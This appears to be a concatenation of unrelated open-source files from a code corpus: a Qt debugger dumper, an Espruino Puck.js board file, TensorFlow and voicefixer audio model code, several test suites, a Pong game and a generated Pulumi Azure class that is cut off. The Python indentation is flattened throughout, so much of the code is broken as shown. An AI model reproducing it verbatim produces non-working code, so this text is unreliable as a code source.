j = value["j"].integer()
d.putValue("[%d,%d]" % (i,j))
d.putExpandable()
if d.isExpanded():
with Children(d):
d.putSubItem('j', value["j"])
# Don't try this at home :-)
# and the "i" (that is the one in quotes stand for type integer...
d.putSubItem('i', d.createValue(struct.pack("i",i), d.intType()))
with SubItem(d, "sum"):
d.putValue(i+j)
d.putType(d.intType()) # not really needed though
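# Hedged illustration of the struct trick above: struct.pack("i", 7) produces four
# native-endian bytes (b'\x07\x00\x00\x00' on a little-endian host), which
# d.createValue then re-interprets as a plain int for the debugger's value display.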
### Part 2
def qdump__MyNameSpace__Foo(d, value):
d.putValue("Secret!")
d.putPlainChildren(value)
### Part 3
#def qdump__Money(d, value):
# amount = value["m_amount"].floatingPoint()
# currency = value["m_currency"].integer()
# d.putValue("%s %s" % (("EUR" if (currency == 0) else "USD"), amount))
# d.putPlainChildren(value)
### Part 4
def qdump__Money(d, value):
str = d.call("@QString", value, "toString")
d.putStringValue(str)
d.putPlainChildren(value)
### Part 5
def qdump__FooOrBar(d, value):
str=d.parseAndEvaluate("fooOrBarToString(*((FooOrBar*)%s))" % value.laddress)
d.putStringValue(str)
d.putPlainChildren(value)
#### Part 6
def qdump__UserID(d, value):
employeeID = value.integer()
str=d.parseAndEvaluate("EmployeeDatabase::instance().lookup(%d)" % employeeID)
d.putStringValue(str)
def qdump__UserIDList(d, value):
d.createTypedefedType(d.lookupType("int"), "UserID");
d.formats[d.currentIName] = DisplayFormat.DirectQListStorage
d.putItem(value.cast("QList<UserID>"))
|
framework/boards/PUCKJS.py | leeeastwood/Haiway | 162 | 46046 | #!/bin/false
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# This file contains information for a specific board - the available pins, and where LEDs,
# Buttons, and other in-built peripherals are. It is used to build documentation as well
# as various source and header files for Espruino.
# ----------------------------------------------------------------------------------------
import pinutils;
info = {
'name' : "Puck.js",
'link' : [ "http://www.espruino.com/PuckJS" ],
'default_console' : "EV_SERIAL1",
'default_console_tx' : "D28",
'default_console_rx' : "D29",
'default_console_baudrate' : "9600",
'variables' : 2250, # How many variables are allocated for Espruino to use. RAM will be overflowed if this number is too high and code won't compile.
'bootloader' : 1,
'binary_name' : 'espruino_%v_puckjs.hex',
'build' : {
'optimizeflags' : '-Os',
'libraries' : [
'BLUETOOTH',
'NET',
'GRAPHICS',
'CRYPTO','SHA256','SHA512',
'AES',
'NFC',
'NEOPIXEL',
#'FILESYSTEM'
#'TLS'
],
'makefile' : [
'DEFINES+=-DHAL_NFC_ENGINEERING_BC_FTPAN_WORKAROUND=1', # Looks like proper production nRF52s had this issue
'DEFINES+=-DCONFIG_GPIO_AS_PINRESET', # Allow the reset pin to work
'DEFINES+=-DBLUETOOTH_NAME_PREFIX=\'"Puck.js"\'',
'DEFINES+=-DCUSTOM_GETBATTERY=jswrap_puck_getBattery',
'DEFINES+=-DNFC_DEFAULT_URL=\'"https://puck-js.com/go"\'',
'DFU_PRIVATE_KEY=targets/nrf5x_dfu/dfu_private_key.pem',
'DFU_SETTINGS=--application-version 0xff --hw-version 52 --sd-req 0x8C',
'INCLUDE += -I$(ROOT)/libs/puckjs',
'WRAPPERSOURCES += libs/puckjs/jswrap_puck.c'
]
}
};
chip = {
'part' : "NRF52832",
'family' : "NRF52",
'package' : "QFN48",
'ram' : 64,
'flash' : 512,
'speed' : 64,
'usart' : 1,
'spi' : 1,
'i2c' : 1,
'adc' : 1,
'dac' : 0,
'saved_code' : {
'address' : ((118 - 10) * 4096), # Bootloader takes pages 120-127, FS takes 118-119
'page_size' : 4096,
'pages' : 10,
'flash_available' : 512 - ((31 + 8 + 2 + 10)*4) # Softdevice uses 31 pages of flash, bootloader 8, FS 2, code 10. Each page is 4 kb.
},
};
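# Hedged arithmetic check of 'flash_available' above: (31 + 8 + 2 + 10) pages
# * 4 kB/page = 204 kB reserved, leaving 512 - 204 = 308 kB for Espruino code.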
devices = {
'LED1' : { 'pin' : 'D5' },
'LED2' : { 'pin' : 'D4' },
'LED3' : { 'pin' : 'D3' },
'IR' : { 'pin_anode' : 'D25', 'pin_cathode' : 'D26' },
'BTN1' : { 'pin' : 'D0', 'pinstate' : 'IN_PULLDOWN' },
'CAPSENSE' : { 'pin_rx' : 'D11', 'pin_tx' : 'D12' },
'NFC': { 'pin_a':'D9', 'pin_b':'D10' },
'MAG': { 'device': 'MAG3110',
'pin_pwr':'D18',
'pin_int':'D17',
'pin_sda':'D20',
'pin_scl':'D19' }
# Pin D22 is used for clock when driving neopixels - as not specifying a pin seems to break things
};
# left-right, or top-bottom order
board = {
'bottom' : [ 'D28', 'D29', 'D30', 'D31'],
'right' : [ 'GND', '3V', 'D2', 'D1' ],
'left2' : [ 'D6','D7','D8','D11','D13','D14','D16','D23','D24','D27' ],
'right2' : [ 'D15' ],
'_notes' : {
'D11' : "Capacitive sense. D12 is connected to this pin via a 1 MOhm resistor",
'D28' : "If pulled up to 1 on startup, D28 and D29 become Serial1",
'D22' : "This is used as SCK when driving Neopixels with 'require('neopixel').write'"
}
};
board["_css"] = """
#board {
width: 800px;
height: 800px;
top: 0px;
left : 0px;
background-image: url(img/PUCKJS_.jpg);
}
#boardcontainer {
height: 900px;
}
#bottom {
top: 639px;
left: 291px;
}
#right {
top: 304px;
left: 640px;
}
.bottompin { width: 46px; }
.rightpin { height: 51px; }
.pinD6 { position:absolute; left: 560px; top: 419px;}
.pinD7 { position:absolute; left: 548px; top: 369px;}
.pinD8 { position:absolute; left: 512px; top: 398px;}
.pinD11 { position:absolute; left: 586px; top: 236px;}
.pinD13 { position:absolute; left: 500px; top: 293px;}
.pinD14 { position:absolute; left: 523px; top: 270px;}
.pinD15 { position:absolute; right: -483px; top: 268px;}
.pinD16 { position:absolute; left: 499px; top: 244px;}
.pinD23 { position:absolute; left: 157px; top: 438px;}
.pinD24 { position:absolute; left: 157px; top: 382px;}
.pinD27 { position:absolute; left: 244px; top: 581px;}
""";
def get_pins():
pins = pinutils.generate_pins(0,31) # 32 General Purpose I/O Pins.
pinutils.findpin(pins, "PD0", True)["functions"]["XL1"]=0;
pinutils.findpin(pins, "PD1", True)["functions"]["XL2"]=0;
pinutils.findpin(pins, "PD9", True)["functions"]["NFC1"]=0;
pinutils.findpin(pins, "PD10", True)["functions"]["NFC2"]=0;
pinutils.findpin(pins, "PD2", True)["functions"]["ADC1_IN0"]=0;
pinutils.findpin(pins, "PD3", True)["functions"]["ADC1_IN1"]=0;
pinutils.findpin(pins, "PD4", True)["functions"]["ADC1_IN2"]=0;
pinutils.findpin(pins, "PD5", True)["functions"]["ADC1_IN3"]=0;
pinutils.findpin(pins, "PD28", True)["functions"]["ADC1_IN4"]=0;
pinutils.findpin(pins, "PD28", True)["functions"]["USART1_TX"]=0;
pinutils.findpin(pins, "PD29", True)["functions"]["USART1_RX"]=0;
pinutils.findpin(pins, "PD29", True)["functions"]["ADC1_IN5"]=0;
pinutils.findpin(pins, "PD30", True)["functions"]["ADC1_IN6"]=0;
pinutils.findpin(pins, "PD31", True)["functions"]["ADC1_IN7"]=0;
# everything is non-5v tolerant
for pin in pins:
pin["functions"]["3.3"]=0;
#The boot/reset button will function as a reset button in normal operation. Pin reset on PD21 needs to be enabled on the nRF52832 device for this to work.
return pins
|
malaya_speech/train/model/resnet_unet_enhancement/model.py | ishine/malaya-speech | 111 | 46056 | import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
LeakyReLU,
Activation,
Conv1D,
ELU,
    Add,
    ReLU,
)
from functools import partial
from tensorflow.compat.v1.keras.initializers import he_uniform
def _get_conv_activation_layer(params):
"""
:param params:
:returns: Required Activation function.
"""
conv_activation = params.get('conv_activation')
if conv_activation == 'ReLU':
return ReLU()
elif conv_activation == 'ELU':
return ELU()
return LeakyReLU(0.2)
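# Hedged note: Model below calls _get_conv_activation_layer({}), so
# params.get('conv_activation') is None and the LeakyReLU(0.2) branch is taken.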
class UpSamplingLayer:
def __init__(self, channel_out, kernel_size=5, stride=1):
self.seq = tf.keras.Sequential()
self.seq.add(
tf.keras.layers.Conv1D(
channel_out,
kernel_size=kernel_size,
strides=stride,
padding='SAME',
dilation_rate=1,
)
)
self.seq.add(BatchNormalization(axis=-1))
self.seq.add(LeakyReLU(0.2))
def __call__(self, x, training=True):
return self.seq(x, training=training)
class Model:
def __init__(
self,
inputs,
training=True,
ksize=5,
n_layers=12,
channels_interval=24,
logging=True,
):
conv_activation_layer = _get_conv_activation_layer({})
kernel_initializer = he_uniform(seed=50)
conv1d_factory = partial(
Conv1D,
strides=(2),
padding='same',
kernel_initializer=kernel_initializer,
)
def resnet_block(input_tensor, filter_size):
res = conv1d_factory(
filter_size, (1), strides=(1), use_bias=False
)(input_tensor)
conv1 = conv1d_factory(filter_size, (5), strides=(1))(
input_tensor
)
batch1 = BatchNormalization(axis=-1)(conv1, training=training)
rel1 = conv_activation_layer(batch1)
conv2 = conv1d_factory(filter_size, (5), strides=(1))(rel1)
batch2 = BatchNormalization(axis=-1)(conv2, training=training)
resconnection = Add()([res, batch2])
rel2 = conv_activation_layer(resconnection)
return rel2
self.n_layers = n_layers
self.channels_interval = channels_interval
out_channels = [
i * self.channels_interval for i in range(1, self.n_layers + 1)
]
self.middle = tf.keras.Sequential()
self.middle.add(
tf.keras.layers.Conv1D(
self.n_layers * self.channels_interval,
kernel_size=15,
strides=1,
padding='SAME',
dilation_rate=1,
)
)
self.middle.add(BatchNormalization(axis=-1))
self.middle.add(LeakyReLU(0.2))
decoder_out_channels_list = out_channels[::-1]
self.decoder = []
for i in range(self.n_layers):
self.decoder.append(
UpSamplingLayer(channel_out=decoder_out_channels_list[i])
)
self.out = tf.keras.Sequential()
self.out.add(
tf.keras.layers.Conv1D(
1,
kernel_size=1,
strides=1,
padding='SAME',
dilation_rate=1,
)
)
self.out.add(Activation('tanh'))
tmp = []
o = inputs
for i in range(self.n_layers):
o = resnet_block(o, out_channels[i])
tmp.append(o)
o = o[:, ::2]
if logging:
print(o)
o = self.middle(o, training=training)
if logging:
print(o)
for i in range(self.n_layers):
o = tf.image.resize(
o, [tf.shape(o)[0], tf.shape(o)[1] * 2], method='nearest'
)
o = tf.concat([o, tmp[self.n_layers - i - 1]], axis=2)
o = self.decoder[i](o, training=training)
if logging:
print(o)
if logging:
print(o, inputs)
o = tf.concat([o, inputs], axis=2)
o = self.out(o, training=training)
self.logits = o
|
voicefixer/vocoder/config.py | ishine/voicefixer | 159 | 46083 | <reponame>ishine/voicefixer<filename>voicefixer/vocoder/config.py
import torch
import numpy as np
import os
from voicefixer.tools.path import root_path
class Config:
@classmethod
def refresh(cls, sr):
if sr == 44100:
Config.ckpt = os.path.join(
os.path.expanduser("~"),
".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt",
)
Config.cond_channels = 512
Config.m_channels = 768
Config.resstack_depth = [8, 8, 8, 8]
Config.channels = 1024
Config.cin_channels = 128
Config.upsample_scales = [7, 7, 3, 3]
Config.num_mels = 128
Config.n_fft = 2048
Config.hop_length = 441
Config.sample_rate = 44100
Config.fmax = 22000
Config.mel_win = 128
Config.local_condition_dim = 128
else:
raise RuntimeError(
"Error: Vocoder currently only support 44100 samplerate."
)
ckpt = os.path.join(
os.path.expanduser("~"),
".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt",
)
m_channels = 384
bits = 10
opt = "Ralamb"
cond_channels = 256
clip = 0.5
num_bands = 1
cin_channels = 128
upsample_scales = [7, 7, 3, 3]
filterbands = "test/filterbanks_4bands.dat"
##For inference
tag = ""
min_db = -115
num_mels = 128
n_fft = 2048
hop_length = 441
win_size = None
sample_rate = 44100
frame_shift_ms = None
trim_fft_size = 512
trim_hop_size = 128
trim_top_db = 23
signal_normalization = True
allow_clipping_in_normalization = True
symmetric_mels = True
max_abs_value = 4.0
preemphasis = 0.85
min_level_db = -100
ref_level_db = 20
fmin = 50
fmax = 22000
power = 1.5
griffin_lim_iters = 60
rescale = False
rescaling_max = 0.95
trim_silence = False
clip_mels_length = True
max_mel_frames = 2000
mel_win = 128
batch_size = 24
g_learning_rate = 0.001
d_learning_rate = 0.001
warmup_steps = 100000
decay_learning_rate = 0.5
exponential_moving_average = True
ema_decay = 0.99
reset_opt = False
reset_g_opt = False
reset_d_opt = False
local_condition_dim = 128
lambda_update_G = 1
multiscale_D = 3
lambda_adv = 4.0
lambda_fm_loss = 0.0
lambda_sc_loss = 5.0
lambda_mag_loss = 5.0
lambda_mel_loss = 50.0
use_mle_loss = False
lambda_mle_loss = 5.0
lambda_freq_loss = 2.0
lambda_energy_loss = 100.0
lambda_t_loss = 200.0
lambda_phase_loss = 100.0
lambda_f0_loss = 1.0
use_elu = False
de_preem = False # train
up_org = False
use_one = True
use_small_D = False
use_condnet = True
use_depreem = False # inference
use_msd = False
model_type = "tfgan" # or bytewave, frame level vocoder using istft
use_hjcud = False
no_skip = False
out_channels = 1
use_postnet = False # wn in postnet
use_wn = False # wn in resstack
up_type = "transpose"
use_smooth = False
use_drop = False
use_shift_scale = False
use_gcnn = False
resstack_depth = [6, 6, 6, 6]
kernel_size = [3, 3, 3, 3]
channels = 512
use_f0_loss = False
use_sine = False
use_cond_rnn = False
use_rnn = False
f0_step = 120
use_lowfreq_loss = False
lambda_lowfreq_loss = 1.0
use_film = False
use_mb_mr_gan = False
use_mssl = False
use_ml_gan = False
use_mb_gan = True
use_mpd = False
use_spec_gan = True
use_rwd = False
use_mr_gan = True
use_pqmf_rwd = False
no_sine = False
use_frame_mask = False
lambda_var_loss = 0.0
discriminator_train_start_steps = 40000 # 80k
aux_d_train_start_steps = 40000 # 100k
rescale_out = 0.40
use_dist = True
dist_backend = "nccl"
dist_url = "tcp://localhost:12345"
world_size = 1
mel_weight_torch = torch.tensor(
[
19.40951426,
19.94047336,
20.4859038,
21.04629067,
21.62194148,
22.21335214,
22.8210215,
23.44529231,
24.08660962,
24.74541882,
25.42234287,
26.11770576,
26.83212784,
27.56615283,
28.32007747,
29.0947679,
29.89060111,
30.70832636,
31.54828121,
32.41121487,
33.29780773,
34.20865341,
35.14437675,
36.1056621,
37.09332763,
38.10795802,
39.15039691,
40.22119881,
41.32154931,
42.45172373,
43.61293329,
44.80609379,
46.031602,
47.29070223,
48.58427549,
49.91327905,
51.27863232,
52.68119708,
54.1222372,
55.60274206,
57.12364703,
58.68617876,
60.29148652,
61.94081306,
63.63501986,
65.37562658,
67.16408954,
69.00109084,
70.88850318,
72.82736101,
74.81985537,
76.86654792,
78.96885475,
81.12900906,
83.34840929,
85.62810662,
87.97005418,
90.37689804,
92.84887686,
95.38872881,
97.99777002,
100.67862715,
103.43232942,
106.26140638,
109.16827015,
112.15470471,
115.22184756,
118.37439245,
121.6122689,
124.93877158,
128.35661454,
131.86761321,
135.47417938,
139.18059494,
142.98713744,
146.89771854,
150.91684347,
155.0446638,
159.28614648,
163.64270198,
168.12035831,
172.71749158,
177.44220154,
182.29556933,
187.28286676,
192.40502126,
197.6682721,
203.07516896,
208.63088733,
214.33770931,
220.19910108,
226.22363072,
232.41087124,
238.76803591,
245.30079083,
252.01064464,
258.90261676,
265.98474,
273.26010248,
280.73496362,
288.41440094,
296.30489752,
304.41180337,
312.7377183,
321.28877878,
330.07870237,
339.10812951,
348.38276173,
357.91393924,
367.70513992,
377.76413924,
388.09467408,
398.70920178,
409.61813793,
420.81980127,
432.33215467,
444.16083117,
456.30919947,
468.78589276,
481.61325588,
494.78824596,
508.31969844,
522.2238331,
536.51163441,
551.18859414,
566.26142988,
581.75006061,
597.66210737,
]
)
x_orig = np.linspace(1, mel_weight_torch.shape[0], num=mel_weight_torch.shape[0])
x_orig_torch = torch.linspace(
1, mel_weight_torch.shape[0], steps=mel_weight_torch.shape[0]
)
@classmethod
def get_mel_weight(cls, percent=1, a=18.8927416350036, b=0.0269863588184314):
b = percent * b
def func(a, b, x):
return a * np.exp(b * x)
return func(a, b, Config.x_orig)
@classmethod
def get_mel_weight_torch(cls, percent=1, a=18.8927416350036, b=0.0269863588184314):
b = percent * b
def func(a, b, x):
return a * torch.exp(b * x)
return func(a, b, Config.x_orig_torch)
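    # Hedged note: both helpers above evaluate w(x) = a * exp(percent * b * x)
    # over the 128 mel-bin indices x = 1..128, i.e. the per-bin weight grows
    # exponentially towards the higher-frequency mel bins.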
|
build/platform/python/tests/test_common.py | jochenater/catboost | 6,989 | 46084 | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
|
idangr_core.py | IMULMUL/IDAngr | 237 | 46108 | <gh_stars>100-1000
######################################################
# Author: <NAME> <<EMAIL>> #
# License: BSD 2-Clause #
######################################################
import idangr
print
print "################### IDAngr ###################"
print " usage: idangr.init(is_remote, host, port)"
print " import angrdbg"
print
|
python-pong/main.py | emobileingenieria/youtube | 176 | 46119 | import pygame
from pygame.locals import *
from paddle import Paddle
from ball import Ball
from inputs import handle_events, handle_input
from constants import SCREEN_WIDTH, SCREEN_HEIGHT, WHITE, RED
ball = None
left_paddle = None
right_paddle = None
pygame.init()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
pygame.display.set_caption("Python PONG")
clock = pygame.time.Clock()
done = [False]
is_game_over = [False]
def setup_game():
global ball
global left_paddle
global right_paddle
ball = Ball((SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2))
left_paddle = Paddle()
right_paddle = Paddle()
right_paddle.rect.x = SCREEN_WIDTH - right_paddle.rect.width
def draw_game_over():
font = pygame.font.Font("freesansbold.ttf", 32)
game_over = font.render("GAME OVER", True, RED)
game_over_rect = game_over.get_rect()
game_over_rect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)
screen.blit(game_over, game_over_rect)
def draw_game():
left_paddle.draw(screen)
right_paddle.draw(screen)
ball.draw(screen)
def draw():
screen.fill(WHITE)
if is_game_over[0]:
draw_game_over()
else:
draw_game()
pygame.display.flip()
def update():
handle_events(done)
if not is_game_over[0]:
handle_input(left_paddle, right_paddle)
ball.update(left_paddle, right_paddle, is_game_over)
setup_game()
while not done[0]:
clock.tick(30)
update()
draw()
pygame.quit()
|
hs_access_control/tests/test_group_public.py | tommac7/hydroshare | 178 | 46148 | from django.test import TestCase
from django.contrib.auth.models import Group
from hs_access_control.models import PrivilegeCodes
from hs_core import hydroshare
from hs_core.testing import MockIRODSTestCaseMixin
from hs_access_control.tests.utilities import global_reset, is_equal_to_as_set
class T09GroupPublic(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(T09GroupPublic, self).setUp()
global_reset()
self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
self.admin = hydroshare.create_account(
'<EMAIL>',
username='admin',
first_name='administrator',
last_name='couch',
superuser=True,
groups=[]
)
self.dog = hydroshare.create_account(
'<EMAIL>',
username='dog',
first_name='<NAME>',
last_name='last_name_dog',
superuser=False,
groups=[]
)
self.squirrels = hydroshare.create_resource(
resource_type='GenericResource',
owner=self.dog,
title='all about chasing squirrels',
metadata=[],
)
self.holes = hydroshare.create_resource(
resource_type='GenericResource',
owner=self.dog,
title='all about storing bones in holes',
metadata=[],
)
# dog owns canines group
self.canines = self.dog.uaccess.create_group(
title='canines', description="We are the canines")
def test_public_resources(self):
""" public resources contain those resources that are public and discoverable """
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, []))
self.dog.uaccess.share_resource_with_group(self.squirrels, self.canines,
PrivilegeCodes.VIEW)
self.dog.uaccess.share_resource_with_group(self.holes, self.canines,
PrivilegeCodes.VIEW)
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, []))
self.holes.raccess.public = True
self.holes.raccess.discoverable = True
self.holes.raccess.save() # this avoids regular requirements for "public"
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, [self.holes]))
for r in res:
self.assertEqual(r.public, r.raccess.public)
self.assertEqual(r.discoverable, r.raccess.discoverable)
self.assertEqual(r.published, r.raccess.published)
self.assertEqual(r.group_name, self.canines.name)
self.assertEqual(r.group_id, self.canines.id)
self.squirrels.raccess.discoverable = True
self.squirrels.raccess.save()
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, [self.holes, self.squirrels]))
for r in res:
self.assertEqual(r.public, r.raccess.public)
self.assertEqual(r.discoverable, r.raccess.discoverable)
self.assertEqual(r.published, r.raccess.published)
self.assertEqual(r.group_name, self.canines.name)
self.assertEqual(r.group_id, self.canines.id)
|
visualize/example/__init__.py | rentainhe/visualization | 169 | 46161 | from .grid_attention_example import run_grid_attention_example
from .region_attention_example import run_region_attention_example |
tests/test_utils.py | metasyn/scikeras | 111 | 46221 | import numpy as np
import pytest
from tensorflow.keras import losses as losses_module
from tensorflow.keras import metrics as metrics_module
from scikeras.utils import loss_name, metric_name
class CustomLoss(losses_module.Loss):
pass
class CustomMetric(metrics_module.AUC):
pass
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
losses_module.categorical_crossentropy,
losses_module.CategoricalCrossentropy,
losses_module.CategoricalCrossentropy(),
],
)
def test_loss_invariance(obj):
"""Test to make sure loss_name returns same string no matter which object
is passed (str, function, class, type)"""
assert loss_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("obj", [CustomLoss, CustomLoss()])
def test_custom_loss(obj):
assert loss_name(obj) == "custom_loss"
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
metrics_module.categorical_crossentropy,
metrics_module.CategoricalCrossentropy,
metrics_module.CategoricalCrossentropy(),
],
)
def test_metric_invariance(obj):
"""Test to make sure same metric returned no matter which object passed"""
assert metric_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("loss", [object(), object, list()])
def test_loss_types(loss):
with pytest.raises(TypeError, match="``loss`` must be a"):
loss_name(loss)
def test_unknown_loss_raises():
with pytest.raises(ValueError, match="Unknown loss function"):
loss_name("unknown_loss")
@pytest.mark.parametrize("obj", [object(), object, list()])
def test_metric_types(obj):
with pytest.raises(TypeError, match="``metric`` must be a"):
metric_name(obj)
def test_unknown_metric():
with pytest.raises(ValueError, match="Unknown metric function"):
metric_name("unknown_metric")
@pytest.mark.parametrize("metric", [CustomMetric, CustomMetric()])
def test_custom_metric(metric):
assert metric_name(metric) == "custom_metric"
|
sdk/python/pulumi_azure/apimanagement/product_api.py | henriktao/pulumi-azure | 109 | 46223 | <reponame>henriktao/pulumi-azure<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProductApiArgs', 'ProductApi']
@pulumi.input_type
class ProductApiArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
api_name: pulumi.Input[str],
product_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str]):
"""
The set of arguments for constructing a ProductApi resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "api_name", api_name)
pulumi.set(__self__, "product_id", product_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Input[str]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Input[str]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: pulumi.Input[str]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@pulumi.input_type
class _ProductApiState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ProductApi resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if api_name is not None:
pulumi.set(__self__, "api_name", api_name)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
class ProductApi(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProductApiArgs,
